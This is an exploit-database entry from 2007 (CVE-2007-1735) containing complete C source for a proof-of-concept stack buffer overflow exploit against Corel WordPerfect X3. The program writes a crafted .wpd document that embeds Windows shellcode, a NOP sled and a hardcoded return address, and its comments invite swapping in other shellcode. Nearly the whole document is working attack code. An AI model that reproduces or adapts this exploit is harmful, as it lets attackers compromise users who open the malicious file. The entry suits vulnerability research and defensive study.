Exploit Corel WordPerfect X3 13.0.0.565 - '.prs' Local Buffer Overflow

[Exploiter]

EDB-ID

3593

Проверка EDB

1. Пройдено

Автор

JONATHAN SO

Тип уязвимости

LOCAL

Платформа

WINDOWS

CVE

cve-2007-1735

Дата публикации

2007-03-28

/**
 * wp13exp.c - Wordperfect X3 remote exploit
 *
 * Proof of concept exploit for a stack based overflow in
 * Corel Wordperfext X3.  The vulnerability can be exploited
 * by tricking a user into opening a specially crafted document.
 * 
 * Usage:
 *
 * c:\win13exp evildoc.wpd
 *
 * Original advisory: http://www.nop-art.net/advisories/wpwin13.txt
 * Author: Jonathan So [ jonny [ @ ] nop-art.net ]
 */

#define WINDOWS
//#define LINUX

#ifdef WINDOWS
	#include <windows.h>
#endif
#include <stdio.h>

// Tested for Wordperfect X3 (13.0.0.565) on XP SP2
#define RET_ADDR 0x0012DF50

// Don't change these
#define PKT_INDEX_SIZE 14
#define HEADER_SIZE 512
#define PRINTSEL_PKT_SIZE 530
#define PRINTSEL_FAKE_SIZE 713
#define FONTDESC_PKT_SIZE 420

// WordPerfect file header
struct wp_header {
	unsigned char file_id[4];
	unsigned long doc_ptr;
	unsigned char product_type;
	unsigned char document_type;
	unsigned char major_version;
	unsigned char minor_version;
	unsigned short encryption;
	unsigned short index_ptr;
	unsigned char reserved[4];
	unsigned long file_size;
	unsigned char extended_header[488];
};

// Index for data packet
struct packet_index {
	unsigned char flags;
	unsigned char packet_type;
	unsigned short use_count;
	unsigned short hidden_count;
	unsigned long size;
	unsigned long data_ptr;
};

// This WinExec shellcode locates kernel32.dll using PEB method before
// calling WinExec (using the string at the end of the shellcode) and
// finally calling ExitProcess.  Should work for XP/2000/2003/NT but
// any shellcode should plug straight in, up to 420 bytes and it doesn't
// matter if it contain nulls. 
char shellcode[] =
	"\xb8\x7e\xd8\xe2\x73\x50\xe8\x21\x00\x00\x00\x83\xc4\x04\x50\xb8\x98\xfe\x8a\x0e\x50\xe8\x12\x00\x00\x00"
	"\x83\xc4\x04\x50\xeb\x62\x5e\x58\x6a\x00\x56\xff\xd0\x58\x6a\x00\xff\xd0\x33\xc0\x64\xa1\x30\x00\x00\x00"
	"\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x8b\x45\x3c\x8b\x54\x05\x78\x03\xd5\x8b\x5a\x20\x8b\x4a\x18\x03"
	"\xdd\xe3\x30\x49\x8b\x34\x8b\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03\xf8\xeb\xf4"
	"\x3b\x7c\x24\x04\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xc3"
	"\xe8\x99\xff\xff\xff" "cmd /c echo nop-art>c:\\test.txt && notepad c:\\test.txt\x00";

char fill_string[] = "nop-art.net";

void construct_header(struct wp_header* header) {
	int i;

	// These are constant for all Wordperfect documents
	header->file_id[0] = -1;
	header->file_id[1] = 'W';
	header->file_id[2] = 'P';
	header->file_id[3] = 'C';
	
	// Document header values
	header->doc_ptr = 0;
	header->product_type = 0x01;
	header->document_type = 0x0A;
	header->major_version = 0x02;
	header->minor_version = 0x01;
	header->encryption = 0x00;
	header->index_ptr = 0x0200;

	header->reserved[0] = 0x05;
	for (i=1;i<4;i++) {
		header->reserved[i] = 0x00;
	}

	header->file_size = 0;

	for (i=0;i<488;i++) {
		header->extended_header[i] = 0x00;
	}
}

void construct_document(FILE *fp, long ret_addr)
{
	// Index packets
	struct packet_index index[3] = {
		{ 0x02, 0x00, 0x03, 0x00, 0x00, 0x00 },
		{ 0x00, 0x55, 0x01, 0x00, 0x00, 0x00 },
		{ 0x08, 0x23, 0x01, 0x00, 0x00, 0x00 }
	};

	struct wp_header header;

	unsigned char fontdesc_packet[FONTDESC_PKT_SIZE];
	unsigned char printsel_packet[PRINTSEL_PKT_SIZE];
	char *char_ptr;
	int i;
	int offset;

	construct_header(&header);

	// Fill the font selection packet with NOP's
	for (i=0;i<FONTDESC_PKT_SIZE;i++) {
		fontdesc_packet[i] = 0x90;
	}

	// Set size and offset for index packets
	index[1].size = FONTDESC_PKT_SIZE;
	index[2].size = 713;
	index[2].data_ptr = HEADER_SIZE + (PKT_INDEX_SIZE * 3);
	index[1].data_ptr = index[2].data_ptr + PRINTSEL_PKT_SIZE;

	// Copy shellcode into the end of the font descriptor packet
	offset = index[1].size - sizeof(shellcode);
	for (i=0; i < sizeof(shellcode); i++) {
		fontdesc_packet[i + offset] = shellcode[i];
	}

	// Fill the printer selection packet with some data
	for (i=0; i < PRINTSEL_PKT_SIZE ; i++) {
		printsel_packet[i] = fill_string[i % sizeof(fill_string)];
	}

	// Add the return address on the end. Copied from a unicode buffer to non-unicode
	char_ptr = (char*) &ret_addr;
	for (i=8;i>0;i-=2) {
		printsel_packet[PRINTSEL_PKT_SIZE-i] = *char_ptr;
		printsel_packet[PRINTSEL_PKT_SIZE-(i-1)] = 0x00;
		char_ptr++;
	}

	// Set total file size and pointer to document body
	header.file_size = HEADER_SIZE + (PKT_INDEX_SIZE * 3) + PRINTSEL_PKT_SIZE + FONTDESC_PKT_SIZE;
	header.doc_ptr = header.file_size;

	// Now write all the data to file. Some compilers align structure members
	// on different size boundaries so we have to write them all separately
	fwrite((void*) &header.file_id, 4, 1, fp);
	fwrite((void*) &header.doc_ptr, 4, 1, fp);
	fwrite((void*) &header.product_type, 1, 1, fp);
	fwrite((void*) &header.document_type, 1, 1, fp);
	fwrite((void*) &header.major_version, 1, 1, fp);
	fwrite((void*) &header.minor_version, 1, 1, fp);
	fwrite((void*) &header.encryption, 2, 1, fp);
	fwrite((void*) &header.index_ptr, 2, 1, fp);
	fwrite((void*) &header.reserved, 4, 1, fp);
	fwrite((void*) &header.file_size, 4, 1, fp);
	fwrite((void*) &header.extended_header, 488, 1, fp);

	fwrite((void*) &index[0].flags, 1, 1, fp);
	fwrite((void*) &index[0].packet_type, 1, 1, fp);
	fwrite((void*) &index[0].use_count, 2, 1, fp);
	fwrite((void*) &index[0].hidden_count, 2, 1, fp);
	fwrite((void*) &index[0].size, 4, 1, fp);
	fwrite((void*) &index[0].data_ptr, 4, 1, fp);

	fwrite((void*) &index[1].flags, 1, 1, fp);
	fwrite((void*) &index[1].packet_type, 1, 1, fp);
	fwrite((void*) &index[1].use_count, 2, 1, fp);
	fwrite((void*) &index[1].hidden_count, 2, 1, fp);
	fwrite((void*) &index[1].size, 4, 1, fp);
	fwrite((void*) &index[1].data_ptr, 4, 1, fp);

	fwrite((void*) &index[2].flags, 1, 1, fp);
	fwrite((void*) &index[2].packet_type, 1, 1, fp);
	fwrite((void*) &index[2].use_count, 2, 1, fp);
	fwrite((void*) &index[2].hidden_count, 2, 1, fp);
	fwrite((void*) &index[2].size, 4, 1, fp);
	fwrite((void*) &index[2].data_ptr, 4, 1, fp);

	fwrite(printsel_packet, PRINTSEL_PKT_SIZE, 1, fp);
	fwrite(fontdesc_packet, FONTDESC_PKT_SIZE, 1, fp);

	fclose(fp);
}

int main (int argc, char **argv)
{
        FILE *fp;
        unsigned long ret_addr = RET_ADDR;

        if (argc < 2) {
                printf("Usage: %s <filename> [-r 0xdeadbeef]\n", argv[0]);
                printf(" -r <retaddr>         (0x%x default)\n", ret_addr);
                return 0;
        }

        if (argc >= 4) {
                if (memcmp(argv[2], "-r", strlen(argv[2]))==0) {
                        ret_addr = strtoul(argv[3], NULL, 0);
                }
        }

        if ((fp = fopen(argv[1], "wb")) == NULL) {
                printf("Error creating file: %s\n", argv[1]);
                return -1;
        }

        construct_document(fp, ret_addr);

        printf("Created document %s with return address [0x%x]\n", argv[1], ret_addr);

        return 0;
}

// milw0rm.com [2007-03-28]